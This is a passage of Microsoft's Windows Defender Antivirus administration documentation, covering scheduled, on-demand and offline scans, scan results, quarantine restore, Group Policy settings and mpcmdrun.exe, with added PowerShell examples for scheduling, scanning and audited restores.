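An added example, not part of the Microsoft documentation, that brings together the scheduled-scan settings described in this topic: the weekly full scan, randomisation, the idle-only condition, the daily quick scan and the remediation-required full scan, all set through Set-MpPreference and then checked. It assumes an elevated session; the schedule values are the example's own choices.

```powershell
# Added example (not from the Microsoft documentation): the scheduled-scan settings from this
# topic applied with Set-MpPreference and checked afterwards. Requires an elevated session;
# the schedule values are this example's own choices.
# Day values: 0 = every day, 1 = Sunday ... 7 = Saturday, 8 = never.
# ScanParameters: 1 = quick scan, 2 = full scan. Times are local time of day.

$schedule = @{
    ScanParameters             = 2            # weekly full scan ...
    ScanScheduleDay            = 7            # ... on Saturday ...
    ScanScheduleTime           = '02:00:00'   # ... at 2 am (the string is converted to a DateTime)
    RandomizeScheduleTaskTimes = $true        # spread the start across 0-4 hours (useful for VM/VDI)
    ScanOnlyIfIdleEnabled      = $false       # run even while the machine is in use; with the default
                                              # ($true) a busy machine may never complete a scheduled scan
    ScanScheduleQuickTime      = '12:30:00'   # additional daily quick scan at 12:30
    RemediationScheduleDay     = 0            # remediation-required full scan: every day ...
    RemediationScheduleTime    = '03:00:00'   # ... at 3 am
}
Set-MpPreference @schedule

# Read the schedule back.
Get-MpPreference | Select-Object ScanParameters, ScanScheduleDay, ScanScheduleTime,
    RandomizeScheduleTaskTimes, ScanOnlyIfIdleEnabled, ScanScheduleQuickTime,
    RemediationScheduleDay, RemediationScheduleTime | Format-List

# Did the scans actually run? Compare the last start/end times and ages with the schedule ...
Get-MpComputerStatus | Select-Object QuickScanStartTime, QuickScanEndTime, QuickScanAge,
    FullScanStartTime, FullScanEndTime, FullScanAge | Format-List

# ... and look for event 1002 (scan stopped before completion, for example when running on
# battery) in the Windows Defender operational log.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 1002
} -MaxEvents 10 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message | Format-Table -Wrap
```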

Related topics
Prevent or allow users to locally modify policy settings
Configure and run on-demand Windows Defender Antivirus scans
Configure Windows Defender Antivirus scanning options
Manage Windows Defender Antivirus updates and apply baselines
Manage when protection updates should be downloaded and applied
Windows Defender Antivirus in Windows 10
Configure and run on-demand Windows Defender
Antivirus scans
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can run an on-demand scan on individual endpoints. These scans will start immediately, and you can define
parameters for the scan, such as the location or type.

Quick scan versus full scan


Quick scan looks at all the locations where there could be malware registered to start with the system, such as
registry keys and known Windows startup folders.
Combined with always-on real-time protection capability--which reviews files when they are opened and closed,
and whenever a user navigates to a folder--a quick scan helps provide strong coverage both for malware that starts
with the system and kernel-level malware.
In most instances, this means a quick scan is adequate to find malware that wasn't picked up by real-time
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any inactive
components that require a more thorough clean-up, and can be ideal when running on-demand scans.

NOTE
By default, quick scans run on mounted removable devices, such as USB drives.

Use Configuration Manager to run a scan:


See Antimalware and firewall tasks: How to perform an on-demand scan for details on using System Center
Configuration Manager (current branch) to run a scan.
Use the mpcmdrun.exe command-line utility to run a scan:
Use the following -scan parameter:

mpcmdrun.exe -scan -scantype 1

See Use the mpcmdrun.exe command-line tool to configure and manage Windows Defender Antivirus for more
information on how to use the tool and additional parameters, including starting a full scan or defining paths.
Use Microsoft Intune to run a scan:
1. In Intune, go to Devices > All Devices and select the device you want to scan.
2. Select ...More and then select Quick Scan or Full Scan.
Use the Windows Security app to run a scan:
See Run a scan in the Windows Security app for instructions on running a scan on individual endpoints.
Use PowerShell cmdlets to run a scan:
Use the following cmdlet:

Start-MpScan

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to run a scan:
Use the Start method of the MSFT_MpScan class.
See the following for more information and allowed parameters:
Windows Defender WMIv2 APIs

Related topics
Configure Windows Defender Antivirus scanning options
Configure scheduled Windows Defender Antivirus scans
Windows Defender Antivirus in Windows 10
Review Windows Defender Antivirus scan results
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
After a Windows Defender Antivirus scan completes, whether it is an on-demand or scheduled scan, the results
are recorded and you can view them.
Use Microsoft Intune to review scan results:
1. In Intune, go to Devices > All Devices and select the device you want to scan.
2. Click the scan results in Device actions status.
Use Configuration Manager to review scan results:
See How to monitor Endpoint Protection status.
Use the Windows Security app to review scan results:
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Scan history
label.
Click See full history for any of the sections to see previous detections and the action taken. You can
also clear the list.
Information about the last scan is displayed at the bottom of the page.
Use PowerShell cmdlets to review scan results:
The following cmdlet will return each detection on the endpoint. If there are multiple detections of the same threat,
each detection will be listed separately, based on the time of each detection:

Get-MpThreatDetection
You can specify -ThreatID to limit the output to only show the detections for a specific threat.
If you want to list threat detections, but combine detections of the same threat into a single item, you can use the
following cmdlet:

Get-MpThreat

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to review scan results:
Use the Get method of the MSFT_MpThreat and MSFT_MpThreatDetection classes.
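An added example, not part of the Microsoft documentation, that ties the on-demand scan topic to this one: it runs a custom scan of a single folder with Start-MpScan and then summarises the recorded detections by joining Get-MpThreatDetection (one entry per detection) with Get-MpThreat (one entry per threat). It assumes an elevated session; the scan path is a placeholder.

```powershell
# Added example (not from the Microsoft documentation): run an on-demand custom scan of one
# folder, then summarise what Windows Defender Antivirus recorded with Get-MpThreat and
# Get-MpThreatDetection. Requires an elevated session; the scan path is a placeholder.

$scanPath = 'C:\Users\Public\Downloads'   # PLACEHOLDER: folder to scan
$started  = Get-Date

# -ScanType accepts QuickScan, FullScan or CustomScan (CustomScan needs -ScanPath).
Start-MpScan -ScanType CustomScan -ScanPath $scanPath

# Get-MpThreat: one entry per threat (name, severity, whether it executed) ...
$threatById = @{}
Get-MpThreat | ForEach-Object { $threatById[$_.ThreatID] = $_ }
$severity = @{ 0 = 'Unknown'; 1 = 'Low'; 2 = 'Moderate'; 4 = 'High'; 5 = 'Severe' }

# ... Get-MpThreatDetection: one entry per detection, with the files, process and outcome.
# Use -ThreatID <id> on either cmdlet to narrow the output to a single threat.
$report = Get-MpThreatDetection |
    Where-Object { $_.InitialDetectionTime -ge $started -or $_.LastThreatStatusChangeTime -ge $started } |
    ForEach-Object {
        $t = $threatById[$_.ThreatID]
        [pscustomobject]@{
            Detected  = $_.InitialDetectionTime
            ThreatID  = $_.ThreatID
            Name      = if ($t) { $t.ThreatName } else { '(not in Get-MpThreat)' }
            Severity  = if ($t) { $severity[[int]$t.SeverityID] } else { '' }
            Executed  = if ($t) { $t.DidThreatExecute } else { $null }
            StatusID  = $_.ThreatStatusID      # MSFT_MpThreatDetection status code; codes above 100 are failed actions
            Success   = $_.ActionSuccess
            Process   = $_.ProcessName
            Resources = ($_.Resources -join '; ')   # files / registry paths involved in the detection
        }
    } | Sort-Object Detected -Descending

$report | Format-Table -AutoSize -Wrap

# Anything the engine could not remediate may need a reboot or a remediation-required full scan.
$failed = $report | Where-Object { -not $_.Success }
if ($failed) { Write-Warning "$($failed.Count) detection(s) were not remediated successfully." }
```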

Related topics
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Run and review the results of a Windows Defender
Offline scan
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Offline is an antimalware scanning tool that lets you boot and run a scan from a trusted
environment. The scan runs from outside the normal Windows kernel so it can target malware that attempts to
bypass the Windows shell, such as viruses and rootkits that infect or overwrite the master boot record (MBR).
You can use Windows Defender Offline if you suspect a malware infection, or you want to confirm a thorough clean
of the endpoint after a malware outbreak.
In Windows 10, Windows Defender Offline can be run with one click directly from the Windows Security app. In
previous versions of Windows, a user had to install Windows Defender Offline to bootable media, restart the
endpoint, and load the bootable media.

Pre-requisites and requirements


Windows Defender Offline in Windows 10 has the same hardware requirements as Windows 10.
For more information about Windows 10 requirements, see the following topics:
Minimum hardware requirements
Hardware component guidelines

NOTE
Windows Defender Offline is not supported on machines with ARM processors, or on Windows Server Stock Keeping Units.

To run Windows Defender Offline from the endpoint, the user must be logged in with administrator privileges.

Windows Defender Offline updates


Windows Defender Offline uses the most recent protection updates available on the endpoint; it's updated
whenever Windows Defender Antivirus is updated.

NOTE
Before running an offline scan, you should attempt to update Windows Defender AV protection. You can either force an
update with Group Policy or however you normally deploy updates to endpoints, or you can manually download and install
the latest protection updates from the Microsoft Malware Protection Center.

See the Manage Windows Defender Antivirus Security intelligence updates topic for more information.

Usage scenarios
In Windows 10, version 1607, you can manually force an offline scan. Alternatively, if Windows Defender
determines that Windows Defender Offline needs to run, it will prompt the user on the endpoint.
The need to perform an offline scan will also be revealed in System Center Configuration Manager if you're using it
to manage your endpoints.
The prompt can occur via a notification, similar to the following:

The user will also be notified within the Windows Defender client:

In Configuration Manager, you can identify the status of endpoints by navigating to Monitoring > Overview >
Security > Endpoint Protection Status > System Center Endpoint Protection Status.
Windows Defender Offline scans are indicated under Malware remediation status as Offline scan required.
Configure notifications
Windows Defender Offline notifications are configured in the same policy setting as other Windows Defender AV
notifications.
For more information about notifications in Windows Defender, see the Configure the notifications that appear on
endpoints topic.

Run a scan
IMPORTANT
Before you use Windows Defender Offline, make sure you save any files and shut down running programs. The Windows
Defender Offline scan takes about 15 minutes to run. It will restart the endpoint when the scan is complete. The scan is
performed outside of the usual Windows operating environment. The user interface will appear different from a normal scan
performed by Windows Defender. After the scan is completed, the endpoint will be restarted and Windows will load normally.

You can run a Windows Defender Offline scan with the following:
PowerShell
Windows Management Instrumentation (WMI)
The Windows Security app
Use PowerShell cmdlets to run an offline scan:
Use the following cmdlets:

Start-MpWDOScan

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to run an offline scan:
Use the MSFT_MpWDOScan class to run an offline scan.
The following WMI script snippet will immediately run a Windows Defender Offline scan, which will cause the
endpoint to restart, run the offline scan, and then restart and boot into Windows.

wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call Start

See the following for more information:


Windows Defender WMIv2 APIs
Use the Windows Defender Security app to run an offline scan:
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Advanced
scan label:
3. Select Windows Defender Offline scan and click Scan now.
NOTE
In Windows 10, version 1607, the offline scan could be run from under Windows Settings > Update & security >
Windows Defender or from the Windows Defender client.

Review scan results


Windows Defender Offline scan results will be listed in the Scan history section of the Windows Security app.

Related topics
Customize, initiate, and review the results of scans and remediation
Windows Defender Antivirus in Windows 10
Restore quarantined files in Windows Defender AV
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
If Windows Defender Antivirus is configured to detect and remediate threats on your device, Windows Defender
Antivirus quarantines suspicious files. If you are certain these files do not present a threat, you can restore them.
1. Open Windows Security.
2. Click Virus & threat protection and then click Threat History.
3. Under Quarantined threats, click See full history.
4. Click an item you want to keep, then click Restore. (If you prefer to remove the item, you can click Remove.)
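The decision to restore hinges on "if you are certain these files do not present a threat", and the Windows Security app shows little of the evidence behind a detection. As an added example (not part of this documentation), the script below joins Get-MpThreatDetection with Get-MpThreat to show threat name, severity, affected files, the process and user involved, and then performs the restore through MpCmdRun.exe -Restore only after a -Confirm prompt, writing an audit line. The severity labels follow the SeverityID values of the MSFT_MpThreat WMI class; the audit-log path and function names are my own assumptions.

```powershell
# Added example, not part of the Microsoft documentation. Builds a quarantine
# review report and performs an audited restore of one named threat via
# MpCmdRun.exe. Run in an elevated PowerShell session with the Defender module.

function Get-MpQuarantineReport {
    [CmdletBinding()]
    param()
    # SeverityID values as documented for the MSFT_MpThreat WMI class.
    $severity = @{ 0 = 'Unknown'; 1 = 'Low'; 2 = 'Moderate'; 4 = 'High'; 5 = 'Severe' }
    $threats  = @{}
    foreach ($t in Get-MpThreat) { $threats[$t.ThreatID] = $t }

    foreach ($d in Get-MpThreatDetection) {
        $t = $threats[$d.ThreatID]
        [pscustomobject]@{
            DetectedAt = $d.InitialDetectionTime
            ThreatName = if ($t) { $t.ThreatName } else { "ThreatID $($d.ThreatID)" }
            Severity   = if ($t -and $severity.ContainsKey([int]$t.SeverityID)) { $severity[[int]$t.SeverityID] } else { 'Unknown' }
            Resources  = (@($d.Resources) -join '; ')
            Process    = $d.ProcessName
            User       = $d.DomainUser
            ActionOk   = $d.ActionSuccess
        }
    }
}

function Restore-MpQuarantinedThreat {
    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param(
        # Threat name exactly as shown by Get-MpQuarantineReport or MpCmdRun -Restore -ListAll.
        [Parameter(Mandatory)][string]$ThreatName,
        # Optional folder to restore into; MpCmdRun uses the original location otherwise.
        [string]$RestoreTo,
        # Assumed audit-trail location.
        [string]$AuditLog = (Join-Path $env:ProgramData 'DefenderRestoreAudit.log')
    )
    $mp     = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
    $mpArgs = @('-Restore', '-Name', $ThreatName, '-All')
    if ($RestoreTo) { $mpArgs += @('-Path', $RestoreTo) }

    # ConfirmImpact High means this prompts unless the caller passes -Confirm:$false.
    if ($PSCmdlet.ShouldProcess($ThreatName, 'Restore from Windows Defender quarantine')) {
        $output = & $mp @mpArgs 2>&1
        $line   = '{0:u} {1} restored "{2}" exit={3}' -f (Get-Date), $env:USERNAME, $ThreatName, $LASTEXITCODE
        Add-Content -Path $AuditLog -Value ($line, $output)
        [pscustomobject]@{ ThreatName = $ThreatName; ExitCode = $LASTEXITCODE; Output = $output }
    }
}

# Usage:
#   Get-MpQuarantineReport | Sort-Object DetectedAt -Descending | Format-Table -AutoSize
#   & "$env:ProgramFiles\Windows Defender\MpCmdRun.exe" -Restore -ListAll
#   Restore-MpQuarantinedThreat -ThreatName 'Virus:DOS/EICAR_Test_File' -Confirm
```

The report is the artefact to attach to the change record; the restore function refuses to run silently, and the audit line records who restored what and the tool's exit code.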

Related topics
Configure remediation for scans
Review scan results
Configure and validate exclusions based on file name, extension, and folder location
Configure and validate exclusions for files opened by processes
Configure Windows Defender Antivirus exclusions on Windows Server
Manage Windows Defender Antivirus in your business
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can manage and configure Windows Defender Antivirus with the following tools:
Microsoft Intune
System Center Configuration Manager
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)
The mpcmdrun.exe utility
The topics in this section provide further information, links, and resources for using these tools to manage and
configure Windows Defender Antivirus.

In this section
TOPIC | DESCRIPTION
Manage Windows Defender Antivirus with Microsoft Intune and System Center Configuration Manager | Information about using Intune and System Center Configuration Manager to deploy, manage, report, and configure Windows Defender Antivirus
Manage Windows Defender Antivirus with Group Policy settings | List of all Group Policy settings located in ADMX templates
Manage Windows Defender Antivirus with PowerShell cmdlets | Instructions for using PowerShell cmdlets to manage Windows Defender Antivirus, plus links to documentation for all cmdlets and allowed parameters
Manage Windows Defender Antivirus with Windows Management Instrumentation (WMI) | Instructions for using WMI to manage Windows Defender Antivirus, plus links to documentation for the WMIv2 APIs (including all classes, methods, and properties)
Manage Windows Defender Antivirus with the mpcmdrun.exe command-line tool | Instructions on using the dedicated command-line tool to manage and use Windows Defender Antivirus
Use Group Policy settings to configure and manage
Windows Defender Antivirus
4/5/2019 • 8 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can use Group Policy to configure and manage Windows Defender Antivirus on your endpoints.
In general, you can use the following procedure to configure or change Windows Defender Antivirus group policy
settings:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object (GPO) you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus.
5. Expand the section (referred to as Location in the table in this topic) that contains the setting you want to
configure, double-click the setting to open it, and make configuration changes.
6. Deploy the updated GPO as you normally do.
The following table in this topic lists the Group Policy settings available in Windows 10, version 1703, and provides
links to the appropriate topic in this documentation library (where applicable).

LOCATION | SETTING | DOCUMENTED IN TOPIC
Client interface | Enable headless UI mode | Prevent users from seeing or interacting with the Windows Defender Antivirus user interface
Client interface | Display additional text to clients when they need to perform an action | Configure the notifications that appear on endpoints
Client interface | Suppress all notifications | Configure the notifications that appear on endpoints
Client interface | Suppresses reboot notifications | Configure the notifications that appear on endpoints
Exclusions | Extension Exclusions | Configure and validate exclusions in Windows Defender Antivirus scans
Exclusions | Path Exclusions | Configure and validate exclusions in Windows Defender Antivirus scans
Exclusions | Process Exclusions | Configure and validate exclusions in Windows Defender Antivirus scans
Exclusions | Turn off Auto Exclusions | Configure and validate exclusions in Windows Defender Antivirus scans
MAPS | Configure the 'Block at First Sight' feature | Enable block at first sight
MAPS | Join Microsoft MAPS | Enable cloud-delivered protection
MAPS | Send file samples when further analysis is required | Enable cloud-delivered protection
MAPS | Configure local setting override for reporting to Microsoft MAPS | Prevent or allow users to locally modify policy settings
MpEngine | Configure extended cloud check | Configure the cloud block timeout period
MpEngine | Select cloud protection level | Specify the cloud-delivered protection level
Network inspection system | Specify additional definition sets for network traffic inspection | Not used
Network inspection system | Turn on definition retirement | Not used
Network inspection system | Turn on protocol recognition | Not used
Quarantine | Configure local setting override for the removal of items from Quarantine folder | Prevent or allow users to locally modify policy settings
Quarantine | Configure removal of items from Quarantine folder | Configure remediation for Windows Defender Antivirus scans
Real-time protection | Configure local setting override for monitoring file and program activity on your computer | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override for monitoring for incoming and outgoing file activity | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override for scanning all downloaded files and attachments | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override for turn on behavior monitoring | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override to turn on real-time protection | Prevent or allow users to locally modify policy settings
Real-time protection | Define the maximum size of downloaded files and attachments to be scanned | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Monitor file and program activity on your computer | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Scan all downloaded files and attachments | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn off real-time protection | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on behavior monitoring | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on process scanning whenever real-time protection is enabled | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on raw volume write notifications | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Configure monitoring for incoming and outgoing file and program activity | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Remediation | Configure local setting override for the time of day to run a scheduled full scan to complete remediation | Prevent or allow users to locally modify policy settings
Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Configure scheduled Windows Defender Antivirus scans
Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Configure scheduled Windows Defender Antivirus scans
Reporting | Configure Watson events | Not used
Reporting | Configure Windows software trace preprocessor components | Not used
Reporting | Configure WPP tracing level | Not used
Reporting | Configure time out for detections in critically failed state | Not used
Reporting | Configure time out for detections in non-critical failed state | Not used
Reporting | Configure time out for detections in recently remediated state | Not used
Reporting | Configure time out for detections requiring additional action | Not used
Reporting | Turn off enhanced notifications | Configure the notifications that appear on endpoints
Root | Turn off Windows Defender Antivirus | Not used (This setting must be set to Not configured to ensure any installed third-party antivirus apps work correctly)
Root | Define addresses to bypass proxy server | Not used
Root | Define proxy auto-config (.pac) for connecting to the network | Not used
Root | Define proxy server for connecting to the network | Not used
Root | Configure local administrator merge behavior for lists | Prevent or allow users to locally modify policy settings
Root | Allow antimalware service to startup with normal priority | Configure remediation for Windows Defender Antivirus scans
Root | Allow antimalware service to remain running always | Configure remediation for Windows Defender Antivirus scans
Root | Turn off routine remediation | Configure remediation for Windows Defender Antivirus scans
Root | Randomize scheduled task times | Configure scheduled scans for Windows Defender Antivirus
Scan | Allow users to pause scan | Prevent users from seeing or interacting with the Windows Defender Antivirus user interface
Scan | Check for the latest virus and spyware definitions before running a scheduled scan | Manage event-based forced updates
Scan | Define the number of days after which a catch-up scan is forced | Manage updates for endpoints that are out of date
Scan | Turn on catch up full scan | Manage updates for endpoints that are out of date
Scan | Turn on catch up quick scan | Manage updates for endpoints that are out of date
Scan | Configure local setting override for maximum percentage of CPU utilization | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for schedule scan day | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for scheduled quick scan time | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for scheduled scan time | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for the scan type to use for a scheduled scan | Prevent or allow users to locally modify policy settings
Scan | Create a system restore point | Configure remediation for Windows Defender Antivirus scans
Scan | Turn on removal of items from scan history folder | Configure remediation for Windows Defender Antivirus scans
Scan | Turn on heuristics | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Scan | Turn on e-mail scanning | Configure scanning options in Windows Defender Antivirus
Scan | Turn on reparse point scanning | Configure scanning options in Windows Defender Antivirus
Scan | Run full scan on mapped network drives | Configure scanning options in Windows Defender Antivirus
Scan | Scan archive files | Configure scanning options in Windows Defender Antivirus
Scan | Scan network files | Configure scanning options in Windows Defender Antivirus
Scan | Scan packed executables | Configure scanning options in Windows Defender Antivirus
Scan | Scan removable drives | Configure scanning options in Windows Defender Antivirus
Scan | Specify the maximum depth to scan archive files | Configure scanning options in Windows Defender Antivirus
Scan | Specify the maximum percentage of CPU utilization during a scan | Configure scanning options in Windows Defender Antivirus
Scan | Specify the maximum size of archive files to be scanned | Configure scanning options in Windows Defender Antivirus
Scan | Specify the day of the week to run a scheduled scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the interval to run quick scans per day | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the scan type to use for a scheduled scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the time for a daily quick scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the time of day to run a scheduled scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Start the scheduled scan only when computer is on but not in use | Configure scheduled scans for Windows Defender Antivirus
Security intelligence updates | Allow definition updates from Microsoft Update | Manage updates for mobile devices and virtual machines (VMs)
Security intelligence updates | Allow definition updates when running on battery power | Manage updates for mobile devices and virtual machines (VMs)
Security intelligence updates | Allow notifications to disable definitions based reports to Microsoft MAPS | Manage event-based forced updates
Security intelligence updates | Allow real-time definition updates based on reports to Microsoft MAPS | Manage event-based forced updates
Security intelligence updates | Check for the latest virus and spyware definitions on startup | Manage event-based forced updates
Security intelligence updates | Define file shares for downloading definition updates | Manage Windows Defender Antivirus protection and definition updates
Security intelligence updates | Define the number of days after which a catch up definition update is required | Manage updates for endpoints that are out of date
Security intelligence updates | Define the number of days before spyware definitions are considered out of date | Manage updates for endpoints that are out of date
Security intelligence updates | Define the number of days before virus definitions are considered out of date | Manage updates for endpoints that are out of date
Security intelligence updates | Define the order of sources for downloading definition updates | Manage Windows Defender Antivirus protection and definition updates
Security intelligence updates | Initiate definition update on startup | Manage event-based forced updates
Security intelligence updates | Specify the day of the week to check for definition updates | Manage when protection updates should be downloaded and applied
Security intelligence updates | Specify the interval to check for definition updates | Manage when protection updates should be downloaded and applied
Security intelligence updates | Specify the time to check for definition updates | Manage when protection updates should be downloaded and applied
Security intelligence updates | Turn on scan after Security intelligence update | Configure scheduled scans for Windows Defender Antivirus
Threats | Specify threat alert levels at which default action should not be taken when detected | Configure remediation for Windows Defender Antivirus scans
Threats | Specify threats upon which default action should not be taken when detected | Configure remediation for Windows Defender Antivirus scans

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Use System Center Configuration Manager and
Microsoft Intune to configure and manage Windows
Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
If you are using System Center Configuration Manager or Microsoft Intune to manage the endpoints on your
network, you can also use them to manage Windows Defender Antivirus scans.
In some cases, the protection will be labeled as Endpoint Protection, although the engine is the same as that used
by Windows Defender Antivirus.
See the Endpoint Protection library on docs.microsoft.com for information on using Configuration Manager.
For Microsoft Intune, consult the Microsoft Intune library and Configure device restriction settings in Intune.

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Use PowerShell cmdlets to configure and manage
Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can use PowerShell to perform various functions in Windows Defender. Similar to the command prompt or
command line, PowerShell is a task-based command-line shell and scripting language designed especially for
system administration, and you can read more about it at the PowerShell hub on MSDN.
For a list of the cmdlets and their functions and available parameters, see the Defender cmdlets topic.
PowerShell cmdlets are most useful in Windows Server environments that don't rely on a graphical user interface
(GUI) to configure software.

NOTE
PowerShell cmdlets should not be used as a replacement for a full network policy management infrastructure, such as System
Center Configuration Manager, Group Policy Management Console, or Windows Defender Antivirus Group Policy ADMX
templates.

Changes made with PowerShell will affect local settings on the endpoint where the changes are deployed or made.
This means that deployments of policy with Group Policy, System Center Configuration Manager, or Microsoft
Intune can overwrite changes made with PowerShell.
You can configure which settings can be overridden locally with local policy overrides.
PowerShell is typically installed under the folder %SystemRoot%\system32\WindowsPowerShell.
Use Windows Defender Antivirus PowerShell cmdlets:
1. Click Start, type powershell, and press Enter.
2. Click Windows PowerShell to open the interface.
3. Enter the command and parameters.

NOTE
You may need to open an administrator-level version of PowerShell. Right-click the item in the Start menu, click Run as
administrator and click Yes at the permissions prompt.

To open online help for any of the cmdlets type the following:

Get-Help <cmdlet> -Online

Omit the -online parameter to get locally cached help.

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Use Windows Management Instrumentation (WMI) to
configure and manage Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Management Instrumentation (WMI) is a scripting interface that allows you to retrieve, modify, and
update settings.
Read more about WMI at the Microsoft Developer Network System Administration library.
Windows Defender Antivirus has a number of specific WMI classes that can be used to perform most of the same
functions as Group Policy and other management tools. Many of the classes are analogous to Defender PowerShell
cmdlets.
The MSDN Windows Defender WMIv2 Provider reference library lists the available WMI classes for Windows
Defender Antivirus, and includes example scripts.
Changes made with WMI will affect local settings on the endpoint where the changes are deployed or made. This
means that deployments of policy with Group Policy, System Center Configuration Manager, or Microsoft Intune
can overwrite changes made with WMI.
You can configure which settings can be overridden locally with local policy overrides.

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Configure and manage Windows Defender Antivirus
with the mpcmdrun.exe command-line tool
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can perform various Windows Defender Antivirus functions with the dedicated command-line tool
mpcmdrun.exe.
This utility can be useful when you want to automate Windows Defender Antivirus use.
You can find the utility in %ProgramFiles%\Windows Defender\MpCmdRun.exe. You must run it from a command
prompt.

NOTE
You may need to open an administrator-level version of the command prompt. Right-click the item in the Start menu, click
Run as administrator and click Yes at the permissions prompt.

The utility has the following commands:

MpCmdRun.exe [command] [-options]

COMMAND
    DESCRIPTION

-? or -h
    Displays all available options for this tool

-Scan [-ScanType #] [-File <path> [-DisableRemediation] [-BootSectorScan]] [-Timeout <days>] [-Cancel]
    Scans for malicious software

-Trace [-Grouping #] [-Level #]
    Starts diagnostic tracing

-GetFiles
    Collects support information

-GetFilesDiagTrack
    Same as -GetFiles but outputs to temporary DiagTrack folder

-RemoveDefinitions [-All]
    Restores the installed Security intelligence to a previous backup copy or to the original default set

-RemoveDefinitions [-DynamicSignatures]
    Removes only the dynamically downloaded Security intelligence

-RemoveDefinitions [-Engine]
    Restores the previous installed engine

-SignatureUpdate [-UNC | -MMPC]
    Checks for new Security intelligence updates

-Restore [-ListAll | [[-Name <name>] [-All] | [-FilePath <filePath>]] [-Path <path>]]
    Restores or lists quarantined item(s)

-AddDynamicSignature [-Path <path>]
    Loads dynamic Security intelligence

-ListAllDynamicSignatures
    Lists the loaded dynamic Security intelligence

-RemoveDynamicSignature [-SignatureSetID <ID>]
    Removes dynamic Security intelligence

-CheckExclusion -path <path>
    Checks whether a path is excluded
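The table gives the syntax but not what "automate Windows Defender Antivirus use" looks like in practice. As an added example (not part of this documentation), the function below wraps MpCmdRun.exe -Scan for a single file or folder so it can be called from a scheduled task or runbook, passing -ScanType 3 (custom scan), the optional -DisableRemediation and -BootSectorScan switches and a -Timeout, and returns the exit code together with the tool's own output. Reading exit code 2 as "threats found" is the tool's convention and not something this page states; the log path and the function name are my own assumptions.

```powershell
# Added example, not part of the Microsoft documentation. Runs a custom
# MpCmdRun.exe scan of one path, records the outcome, and returns it as an
# object. Run from an elevated PowerShell session.

function Invoke-MpCmdRunScan {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        # Report only; do not let the engine remediate what it finds.
        [switch]$DisableRemediation,
        # Also scan the boot sector of the volume that holds $Path.
        [switch]$BootSectorScan,
        # MpCmdRun expresses -Timeout in days.
        [int]$TimeoutDays = 1,
        # Assumed log location for the run record.
        [string]$LogPath = (Join-Path $env:ProgramData 'MpCmdRunScans.log')
    )
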